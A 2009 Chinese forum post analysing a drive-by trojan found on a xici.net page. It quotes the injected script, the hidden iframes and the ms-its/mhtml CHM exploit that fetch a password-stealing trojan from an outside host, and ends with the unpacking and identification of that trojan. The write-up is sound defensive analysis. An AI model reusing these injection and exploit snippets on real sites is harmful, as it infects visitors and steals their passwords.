木马实例（请勿用在非法用途）

紫禁之颠 · 发表于 2009-11-23 00:20:41

在西祠

[url=http://b14973.xici.net/]http://b14973.xici.net上面溜达时发现有人在放毒，条件反射查了一下他的方法

查看网页代码发现有以下插入的脚本
//
<strong><a href='../mail/sendto.asp?id=寂寞小王子'

title='寂寞小王子'>寂寞小王子</a></strong> 发表日期: <strong>2004-10-02

23:14:33</strong></p>
<table width="580" border="0" cellspacing="0" cellpadding="0">
<tr>
<td>...........

<script language="javascript" type="text/javascript">
NH_O_width=10;Rows=15;
</script>

<script language="javascript" src=
"

http://filer123.go.zccn.net/flesh.js"; type="text/ javascript">
<\/td><\/tr><\/table>
</script>
</td>
</tr>
</table>

</table><script>if(screen.width<1000)document.write("</table><table border=0 width=100%

align=center><tr><td>");else document.write("<table border=0 width=760

align=center><tr><td>");</script><hr size=1></p><p><img src='../images/doc0.gif' width=15

height=15>
//
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://filer123.go.zccn.net/flesh.js
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
将此脚本下载后查看代码flesh.js
//

document.write("<iframe src=http://filer123.go.zccn.net/two/cq.htm width=0

height=0></iframe>");

//
直接去下载这个文件

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://filer123.go.zccn.net/two/cq.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

再查看代码cq.htm

//
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>-</title>
</head>

<body>
<div align="center"><img src="

http://filer123.go.zccn.net/two/it.jpg";> </div>
<Iframe src="mm.htm" width="0" height="0" scrolling="no" frameborder="0"></iframe>
</body>
</html>

//
继续下载上面的文件
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://filer123.go.zccn.net/two/it.jpg

http://filer123.go.zccn.net/two/mm.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

再查看代码mm.htm

//
<textarea id="code" style="display:none;">
<object data="ms-its:mhtml:file&://c:\ray.mht!${path}/two.chm::/two.htm"

type="text/x-scriptlet">
</object>
</textarea>
<script language="javascript">
document.write(code.value.replace(/\${path}/g,location.href.substring(0,location.href.indexO

f('mm.htm'))));
</script>

//

然后我们去下载two.chm看看
使用quickCHM反编译以下two.chm
出现了图标为记事本two.exe，大小为42.5k
用UltraEdit-32查看发现有UPX字样

我用UPX-GUI版来解压缩
解压后为94.5k

查看了一下是delphi编写的木马

最后用瑞星查一下

是这个木马

trojan.psw.lmir.mx

		自动登录	找回密码
密码			注册